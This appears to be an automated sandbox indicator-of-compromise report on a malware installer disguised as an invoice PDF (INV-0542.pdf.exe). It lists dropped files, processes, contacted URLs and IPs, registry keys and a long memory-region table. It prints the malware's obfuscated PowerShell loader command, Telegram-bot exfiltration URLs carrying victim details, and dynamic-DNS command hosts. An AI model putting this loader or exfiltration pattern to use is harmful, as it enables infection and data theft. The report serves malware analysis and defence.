IOC Report
INV-0542.pdf.exe

loading gif

Files

File Path
Type
Category
Malicious
INV-0542.pdf.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fqk3cn0.gm0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq3pog4r.qmi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcdnq0dj.e4o.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryu4jshc.nuk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Neonlysskilt.txt
ASCII text, with very long lines (338), with no line terminators
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Ootid.Clo
data
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb
Unicode text, UTF-8 text, with very long lines (4407), with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Teet173.net
data
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\bibliotekskaldene.meg
data
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\nedlaeggelse.eva
Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\tretrinsraket.rik
data
dropped
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\udplacder.keg
data
dropped
C:\Windows\huzzah.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\INV-0542.pdf.exe
"C:\Users\user\Desktop\INV-0542.pdf.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20a
unknown
https://contoso.com/License
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
132.226.8.169
https://drive.google.com/lBW
unknown
https://reallyfreegeoip.org/xml/8.46.123.75$
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]
149.154.167.220
https://aka.ms/pscore6lBjq
unknown
http://crl.micro=
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://chrome.google.com/webstore?hl=enlBjq
unknown
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://translate.google.com/translate_a/element.js
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/$E
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://www.office.com/lBjq
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://www.ecosia.org/newtab/
unknown
https://reallyfreegeoip.org/xml/8.46.123.75
172.67.177.134
https://github.com/Pester/Pester
unknown
https://drive.usercontent.google.com/U
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://anotherarmy.dns.army:8081
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://reallyfreegeoip.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
172.217.19.174
drive.usercontent.google.com
142.250.181.1
reallyfreegeoip.org
172.67.177.134
api.telegram.org
149.154.167.220
checkip.dyndns.com
132.226.8.169
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
132.226.8.169
checkip.dyndns.com
United States
149.154.167.220
api.telegram.org
United Kingdom
142.250.181.1
drive.usercontent.google.com
United States
172.217.19.174
drive.google.com
United States
172.67.177.134
reallyfreegeoip.org
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\skarnbasses\sporadisk
amortiserendes
HKEY_CURRENT_USER\ddpunkterne\ashlered\popkomponisternes
kendingssignalernes
HKEY_CURRENT_USER\Forhandlingsfrihed\Foulmouthed
boroughwide
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{BD84B380-8CA2-1069-AB1D-08000948F534} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@fontext.dll,-8007
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9AD2000
direct allocation
page execute and read and write
malicious
21891000
trusted library allocation
page read and write
malicious
5839000
trusted library allocation
page read and write
23C0D000
heap
page read and write
238E0000
trusted library allocation
page read and write
66A000
heap
page read and write
6A90000
direct allocation
page read and write
25B0000
heap
page read and write
7370000
trusted library allocation
page read and write
5C1000
heap
page read and write
22A5E000
trusted library allocation
page read and write
602000
heap
page read and write
2183B000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
3310000
heap
page read and write
24630000
trusted library allocation
page read and write
21B71000
trusted library allocation
page read and write
2B70000
heap
page read and write
5C5000
heap
page read and write
AED2000
direct allocation
page execute and read and write
239D0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
7D60000
heap
page read and write
238E0000
trusted library allocation
page read and write
24640000
trusted library allocation
page execute and read and write
238C0000
trusted library allocation
page read and write
2767000
heap
page read and write
23ED0000
trusted library allocation
page read and write
3275000
heap
page read and write
238E0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
7C4000
heap
page read and write
23916000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
9010000
trusted library allocation
page execute and read and write
320E000
heap
page read and write
60A000
heap
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
20E00000
direct allocation
page read and write
22B44000
trusted library allocation
page read and write
9030000
direct allocation
page execute and read and write
239D0000
trusted library allocation
page read and write
81FA000
heap
page read and write
3BE2000
remote allocation
page execute and read and write
690000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
23C18000
heap
page read and write
2183E000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
21A3D000
trusted library allocation
page read and write
8370000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
4EF7000
trusted library allocation
page read and write
23E7D000
stack
page read and write
22A73000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
20DF0000
direct allocation
page read and write
800000
trusted library allocation
page read and write
5B5000
heap
page read and write
23C34000
heap
page read and write
458000
unkown
page readonly
52E000
stack
page read and write
238E0000
trusted library allocation
page read and write
596B000
trusted library allocation
page read and write
350000
trusted library allocation
page read and write
2BE0000
heap
page read and write
5D5000
heap
page read and write
23ED0000
trusted library allocation
page read and write
24630000
trusted library allocation
page execute and read and write
22C18000
trusted library allocation
page read and write
45E2000
remote allocation
page execute and read and write
560000
heap
page read and write
680000
trusted library allocation
page read and write
6ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
77E000
heap
page read and write
23ED0000
trusted library allocation
page read and write
276A000
heap
page read and write
238F0000
trusted library allocation
page read and write
65D000
heap
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
63F000
heap
page read and write
7110000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
21909000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
779000
heap
page read and write
24630000
trusted library allocation
page read and write
628000
heap
page read and write
23AB4000
heap
page read and write
23ED0000
trusted library allocation
page read and write
2B17000
heap
page read and write
23914000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
850000
trusted library allocation
page read and write
401000
unkown
page execute read
238E0000
trusted library allocation
page read and write
21A50000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
3332000
heap
page read and write
24E7000
stack
page read and write
98E000
stack
page read and write
23ED0000
trusted library allocation
page read and write
5C9000
heap
page read and write
238E0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
401000
unkown
page execute read
9DE000
stack
page read and write
2765000
heap
page read and write
4E5000
heap
page read and write
23ED0000
trusted library allocation
page read and write
2BD0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
2AD0000
trusted library allocation
page read and write
354000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
22AB4000
trusted library allocation
page read and write
22D22000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
2194A000
trusted library allocation
page read and write
5E3000
heap
page read and write
77E000
heap
page read and write
6FF6000
heap
page read and write
23A80000
heap
page read and write
21B82000
trusted library allocation
page read and write
29B0000
heap
page read and write
7EE0000
heap
page read and write
23ED0000
trusted library allocation
page read and write
6A40000
direct allocation
page read and write
36D0000
heap
page read and write
5E0000
heap
page read and write
23ED0000
trusted library allocation
page read and write
6960000
direct allocation
page read and write
30BF000
stack
page read and write
238C0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
320E000
heap
page read and write
24620000
trusted library allocation
page read and write
8100000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
2FBE000
stack
page read and write
5D5000
heap
page read and write
22D0C000
trusted library allocation
page read and write
23B95000
heap
page read and write
5C5000
heap
page read and write
238E0000
trusted library allocation
page read and write
21830000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
7F240000
trusted library allocation
page execute and read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
21B0A000
trusted library allocation
page read and write
21B02000
trusted library allocation
page read and write
62D000
heap
page read and write
8580000
trusted library allocation
page execute and read and write
5F8000
heap
page read and write
238E0000
trusted library allocation
page read and write
6F33000
heap
page read and write
23ED0000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
21B8B000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
2193A000
trusted library allocation
page read and write
657000
heap
page read and write
21836000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
7021000
heap
page read and write
238F0000
trusted library allocation
page read and write
21901000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
372000
trusted library allocation
page read and write
23EC0000
trusted library allocation
page execute and read and write
22C2A000
trusted library allocation
page read and write
21842000
trusted library allocation
page read and write
2214000
heap
page read and write
600000
heap
page read and write
238F0000
trusted library allocation
page read and write
8394000
trusted library allocation
page read and write
21A41000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
400000
unkown
page readonly
239D0000
trusted library allocation
page read and write
2560000
heap
page read and write
238E0000
trusted library allocation
page read and write
90D2000
direct allocation
page execute and read and write
6ED7000
trusted library allocation
page read and write
8380000
trusted library allocation
page execute and read and write
24660000
trusted library allocation
page read and write
22C40000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23910000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
73CB000
stack
page read and write
2AE9000
trusted library allocation
page read and write
21870000
trusted library allocation
page read and write
21A13000
trusted library allocation
page read and write
3318000
heap
page read and write
21530000
remote allocation
page read and write
23BE1000
heap
page read and write
238E0000
trusted library allocation
page read and write
22C30000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
6B0000
direct allocation
page read and write
7E95000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
7E50000
trusted library allocation
page execute and read and write
6C0000
direct allocation
page read and write
238E0000
trusted library allocation
page read and write
20E70000
direct allocation
page read and write
6A50000
direct allocation
page read and write
238E0000
trusted library allocation
page read and write
2156E000
stack
page read and write
23ED0000
trusted library allocation
page read and write
23EBE000
stack
page read and write
238E0000
trusted library allocation
page read and write
8269000
heap
page read and write
239D0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
2161A000
stack
page read and write
21865000
trusted library allocation
page read and write
2391A000
trusted library allocation
page read and write
69F0000
direct allocation
page read and write
2BE7000
heap
page read and write
8168000
heap
page read and write
700000
heap
page read and write
24660000
trusted library allocation
page read and write
276B000
heap
page read and write
5B5000
heap
page read and write
5DA000
heap
page read and write
458000
unkown
page readonly
238E0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
212FE000
stack
page read and write
6A0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
5DA000
heap
page read and write
2290E000
trusted library allocation
page read and write
376000
trusted library allocation
page execute and read and write
7180000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
2B05000
trusted library allocation
page execute and read and write
2AC0000
trusted library allocation
page read and write
239BE000
stack
page read and write
22D62000
trusted library allocation
page read and write
21780000
heap
page execute and read and write
3268000
heap
page read and write
7E2E000
stack
page read and write
23920000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
454000
unkown
page read and write
9020000
trusted library allocation
page execute and read and write
238E0000
trusted library allocation
page read and write
23B80000
heap
page read and write
20E10000
direct allocation
page read and write
22D5F000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
6A60000
direct allocation
page read and write
2B79000
heap
page read and write
23ED0000
trusted library allocation
page read and write
40A000
unkown
page write copy
238F0000
trusted library allocation
page read and write
820000
trusted library allocation
page execute and read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
20E50000
direct allocation
page read and write
239D0000
trusted library allocation
page read and write
21B0C000
trusted library allocation
page read and write
632000
heap
page read and write
24630000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
5E0000
heap
page read and write
238B0000
trusted library allocation
page read and write
3311000
heap
page read and write
238B0000
trusted library allocation
page read and write
20E80000
direct allocation
page read and write
238F0000
trusted library allocation
page read and write
21B11000
trusted library allocation
page read and write
4ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
59E2000
remote allocation
page execute and read and write
2392D000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
229CB000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
35D0000
heap
page read and write
238C0000
trusted library allocation
page read and write
5963000
trusted library allocation
page read and write
238D0000
trusted library allocation
page read and write
5FB000
heap
page read and write
82AF000
heap
page read and write
2184E000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
631000
heap
page read and write
23ED0000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
71CE000
stack
page read and write
72A0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5D4000
heap
page read and write
5C1000
heap
page read and write
8216000
heap
page read and write
468000
unkown
page readonly
68CB000
stack
page read and write
7D2000
heap
page read and write
5C1000
heap
page read and write
239D0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
2185D000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
6A30000
direct allocation
page read and write
2455E000
stack
page read and write
238E0000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
607000
heap
page read and write
22D94000
trusted library allocation
page read and write
5FE000
heap
page read and write
23EDF000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
244DE000
stack
page read and write
72E0000
trusted library allocation
page read and write
2184A000
trusted library allocation
page read and write
9E0000
heap
page read and write
24660000
trusted library allocation
page read and write
333F000
heap
page read and write
5F6000
heap
page read and write
5B5000
heap
page read and write
24750000
trusted library allocation
page execute and read and write
5C5000
heap
page read and write
3330000
heap
page read and write
5C5000
heap
page read and write
5DA000
heap
page read and write
24660000
trusted library allocation
page read and write
21A81000
trusted library allocation
page read and write
2133D000
stack
page read and write
2BBE000
stack
page read and write
2461E000
stack
page read and write
23920000
trusted library allocation
page read and write
2918000
heap
page read and write
238B0000
trusted library allocation
page read and write
5C5000
heap
page read and write
21A03000
trusted library allocation
page read and write
724E000
stack
page read and write
340000
trusted library allocation
page read and write
779000
heap
page read and write
23ED0000
trusted library allocation
page read and write
80B0000
trusted library allocation
page read and write
840000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
21A7C000
trusted library allocation
page read and write
5F1000
heap
page read and write
239D0000
trusted library allocation
page read and write
218EB000
trusted library allocation
page read and write
238C6000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
333F000
heap
page read and write
60E000
heap
page read and write
228A4000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
2290A000
trusted library allocation
page read and write
37A000
trusted library allocation
page execute and read and write
238E0000
trusted library allocation
page read and write
22AD0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
211E0000
heap
page read and write
3332000
heap
page read and write
21798000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
5E3000
heap
page read and write
720E000
stack
page read and write
801000
trusted library allocation
page read and write
64E000
heap
page read and write
238B0000
trusted library allocation
page read and write
21B91000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
80AE000
stack
page read and write
829D000
heap
page read and write
21936000
trusted library allocation
page read and write
24AC000
stack
page read and write
8178000
heap
page read and write
23ED0000
trusted library allocation
page read and write
2B02000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5B5000
heap
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5F5000
heap
page read and write
6F23000
heap
page read and write
2B40000
heap
page readonly
81E1000
heap
page read and write
23C2A000
heap
page read and write
618000
heap
page read and write
238E1000
trusted library allocation
page read and write
22B69000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
6E6E000
stack
page read and write
5F0000
heap
page read and write
23EE0000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
823A000
heap
page read and write
239D0000
trusted library allocation
page read and write
832D000
heap
page read and write
650000
heap
page read and write
238E0000
trusted library allocation
page read and write
238A0000
trusted library allocation
page read and write
21946000
trusted library allocation
page read and write
21B15000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
2397D000
stack
page read and write
238E0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
3268000
heap
page read and write
21851000
trusted library allocation
page read and write
21790000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
2B58000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
2A90000
heap
page read and write
611000
heap
page read and write
22BF7000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5C1000
heap
page read and write
67A000
heap
page read and write
238E0000
trusted library allocation
page read and write
216DE000
stack
page read and write
238E0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
830000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
5C1000
heap
page read and write
2B10000
heap
page read and write
810000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23A81000
heap
page read and write
990000
heap
page read and write
238B0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
31F0000
heap
page read and write
239D0000
trusted library allocation
page read and write
6B30000
heap
page read and write
23920000
trusted library allocation
page read and write
690000
trusted library allocation
page read and write
2459E000
stack
page read and write
21770000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
23EC0000
trusted library allocation
page read and write
22A01000
trusted library allocation
page read and write
21A6E000
trusted library allocation
page read and write
84F000
stack
page read and write
4D0000
heap
page read and write
23920000
trusted library allocation
page read and write
24750000
trusted library allocation
page read and write
22904000
trusted library allocation
page read and write
482E000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
468000
unkown
page readonly
238F0000
trusted library allocation
page read and write
57D1000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
5C9000
heap
page read and write
238E0000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
23A81000
heap
page read and write
23ED0000
trusted library allocation
page read and write
6EAE000
stack
page read and write
23ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
3238000
heap
page read and write
238A0000
trusted library allocation
page read and write
8318000
heap
page read and write
238E0000
trusted library allocation
page read and write
215C0000
direct allocation
page read and write
23ED0000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
688E000
stack
page read and write
21CC9000
trusted library allocation
page read and write
66E000
heap
page read and write
23920000
trusted library allocation
page read and write
218F6000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
408000
unkown
page readonly
23ED0000
trusted library allocation
page read and write
4CE000
stack
page read and write
23ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
831D000
heap
page read and write
31C0000
heap
page read and write
22D34000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
326C000
heap
page read and write
6B40000
heap
page read and write
25F0000
trusted library section
page read and write
2AD4000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
2127F000
stack
page read and write
62A000
heap
page read and write
23ED0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
655000
heap
page read and write
23BB8000
heap
page read and write
23ED0000
trusted library allocation
page read and write
6A00000
direct allocation
page read and write
5C9000
heap
page read and write
214CE000
stack
page read and write
2298C000
trusted library allocation
page read and write
276B000
heap
page read and write
23DFE000
stack
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
22AE5000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
7E30000
heap
page read and write
385000
trusted library allocation
page execute and read and write
228B9000
trusted library allocation
page read and write
7E4D000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
21B07000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23EC0000
trusted library allocation
page read and write
5D5000
heap
page read and write
2B00000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
3330000
heap
page read and write
22BEB000
trusted library allocation
page read and write
7B5000
heap
page read and write
21A43000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
21B7F000
trusted library allocation
page read and write
5B5000
heap
page read and write
8C10000
heap
page read and write
24660000
trusted library allocation
page read and write
690E000
stack
page read and write
8306000
heap
page read and write
2172C000
stack
page read and write
3268000
heap
page read and write
3268000
heap
page read and write
2194E000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
3268000
heap
page read and write
2299F000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
7D80000
trusted library allocation
page read and write
67E000
heap
page read and write
20E30000
direct allocation
page read and write
817C000
heap
page read and write
21862000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
31F1000
heap
page read and write
238D0000
trusted library allocation
page read and write
23C18000
heap
page read and write
772000
heap
page read and write
657000
heap
page read and write
480000
heap
page read and write
2AE0000
trusted library allocation
page read and write
21B8D000
trusted library allocation
page read and write
2764000
heap
page read and write
24660000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
24620000
trusted library allocation
page execute and read and write
22B5A000
trusted library allocation
page read and write
22917000
trusted library allocation
page read and write
687000
trusted library allocation
page read and write
5FC000
heap
page read and write
580000
heap
page read and write
806E000
stack
page read and write
21A4B000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
5DA000
heap
page read and write
77E000
heap
page read and write
21AE2000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
21B85000
trusted library allocation
page read and write
3330000
heap
page read and write
238F0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5D5000
heap
page read and write
7EC4000
trusted library allocation
page read and write
25D6000
heap
page read and write
4C60000
heap
page read and write
2123E000
stack
page read and write
767000
heap
page read and write
72B0000
trusted library allocation
page execute and read and write
24740000
trusted library allocation
page read and write
2AF0000
trusted library allocation
page read and write
613000
heap
page read and write
2289F000
trusted library allocation
page read and write
22AB1000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
22891000
trusted library allocation
page read and write
